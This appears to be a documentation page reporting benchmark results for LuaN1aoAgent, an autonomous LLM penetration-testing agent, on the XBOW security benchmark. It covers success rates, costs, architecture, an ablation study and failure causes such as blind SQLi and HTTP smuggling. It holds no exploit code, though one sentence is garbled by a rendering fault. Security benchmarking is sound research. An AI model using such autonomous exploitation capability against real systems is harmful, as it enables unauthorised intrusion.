Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/SanMuzZzZz/LuaN1aoAgent/llms.txt

Use this file to discover all available pages before exploring further.

All experimental data is based on the DeepSeek-V3.2 model on the XBOW Benchmark under zero-shot, zero-human-intervention conditions. Results may vary with different LLM providers or models.

What is the XBOW benchmark

XBOW is a high-fidelity benchmark designed to evaluate LLM-based security agents. Unlike traditional puzzle-like CTFs, XBOW focuses on real-world vulnerability primitives and multi-stage business logic exploit chains — the kind of attack sequences that arise in production systems, not contrived lab exercises.

104 test cases

Unique scenarios spanning easy, medium, and hard difficulty levels.

OWASP Top 10: 2025

Full coverage across 17 vulnerability categories and 18 CWE identifiers.

Real-world focus

Business logic exploit chains, not contrived CTF puzzles.

Difficulty distribution

  • Level 1 — Easy: 45 cases
  • Level 2 — Medium: 51 cases
  • Level 3 — Hard: 8 cases
Vulnerability categories include IDOR, Privilege Escalation, Injection, and 14 others spanning the full CWE landscape.

Performance results

Under zero-shot, zero-human-intervention conditions, LuaN1aoAgent (powered by DeepSeek-V3.2) established a new state-of-the-art (SOTA) for autonomous penetration testing.
LuaN1aoAgent was awarded top ranking at the Tencent Cloud Hackathon (TCH) for its performance and architecture.

Competitive comparison

FrameworkSuccess Rate
LuaN1aoAgent (ours)90.4%
XBOW Commercial Agent85.0%
Cyber-AutoAgent v0.1.384.62%
MAPTA (Academic SOTA)76.9%
LuaN1aoAgent outperforms both the leading commercial agent (XBOW’s own system) and the previous academic state-of-the-art by a meaningful margin.

Success rate by difficulty

DifficultyCasesSuccessesSuccess Rate
Level 1 — Easy454497.8%
Level 2 — Medium514486.3%
Level 3 — Hard8675.0%
Total1049490.4%
The 75% success rate on Level 3 hard tasks — involving complex cross-service jumping and multi-stage logic chains — is particularly significant. This is where most frameworks degrade most sharply.

Cost efficiency analysis

Leveraging the “Hard Veto” mechanism in the Reflector, LuaN1aoAgent avoids redundant hallucination loops, significantly reducing both token consumption and wall-clock time.

$0.09 median cost

Median cost per successful exploit. The average is $0.20, meaning the cost distribution is right-skewed — most exploits are cheap, with a small number of harder tasks consuming more budget.

11 minutes median time

Median time to success. The fastest exploit completed in 1.6 minutes.

Full cost breakdown

MetricValue
Total scenarios104
Successful exploits94
Success rate90.40%
Average time per success16.1 min
Median time per success11 min
Fastest exploit convergence1.6 min
Average cost per success$0.20
Median cost per success$0.09
Total expenditure (all tasks)$27.24
Total expenditure (successes only)$18.91
The 0.09mediancostissignificantforpracticaldeployment.Runningtheentire104tasksuitecost0.09 median cost is significant for practical deployment. Running the entire 104-task suite cost 27.24 total — a fraction of what commercial scanners charge for a single engagement.

How results were achieved

The performance comes from the Dual-Graph Cognitive Architecture (DGCA), which combines two complementary graph structures:
Tracks evidence, hypotheses, vulnerabilities, and exploits as nodes in a causal graph. Every hypothesis requires explicit prior evidence; every causal edge carries a confidence score. This prevents hallucination-driven blind attacks and makes the reasoning chain fully traceable.The Reflector’s “Hard Veto” mechanism uses CCG state to detect when the agent is stuck in a loop and terminates unproductive paths early — a key driver of cost efficiency.
Models the penetration testing plan as a Directed Acyclic Graph (DAG). The Planner emits structured graph-editing operations (ADD_NODE, UPDATE_NODE, DEPRECATE_NODE) rather than natural language instructions. This enables real-time plan adaptation, automatic parallelization of independent sub-tasks, and topological dependency management.

Ablation study

Disabling either graph component causes a significant performance drop, especially on harder tasks:
Framework versionLevel 1Level 2Level 3Total SR
LuaN1aoAgent (full)97.8%86.3%75.0%90.4%
Without Causal Graph (w/o CCG)93.3%58.8%25.0%71.2%
Without Task Graph (w/o DTG)95.6%64.7%37.5%76.0%
ReAct baseline88.9%39.2%25.0%59.6%
The performance gap is small on easy tasks but grows dramatically as complexity increases. On hard tasks, removing the Causal Graph drops success from 75% to 25% — the same as the naive ReAct baseline.

Failure analysis

Of the 104 tasks, 10 (9.6%) failed. Root-cause breakdown:
CategoryRoot causeRepresentative casesRatio
Stochastic observationBlind SQLi / high-uncertainty environmentsXBEN-095, XBEN-05640%
Temporal sensitivityRace conditions / timing-based attacksXBEN-04220%
Protocol bottlenecksComplex HTTP Smuggling / DesyncXBEN-10120%
Context overloadState-knowledge conflation in extreme depthXBEN-08820%
Three systemic failure patterns were identified:
  1. Causal misattribution (40%) — The agent misinterprets ambiguous HTTP responses (e.g., 403 from a space filter vs. a WAF blocking SELECT) and incorrectly prunes a valid attack path.
  2. Strategic divergence / “red herring” effect (30%) — The agent is distracted by high-entropy artifacts and ignores a verified exploit window.
  3. Abstraction leakage (30%) — HTTP library middleware normalizes malformed protocol semantics required for the attack before they reach the wire (e.g., HTTP Smuggling case XBEN-066).

Benchmark traces

Full execution traces for all four experimental variants are available in the repository under xbow-benchmark-results/traces/:
  • traces/Ours/ — Full LuaN1aoAgent
  • traces/Ours-CCG/ — Without Causal Graph
  • traces/Ours-DTG/ — Without Task Graph
  • traces/ReAct/ — ReAct baseline
See the xbow-benchmark-results directory on GitHub for the complete dataset.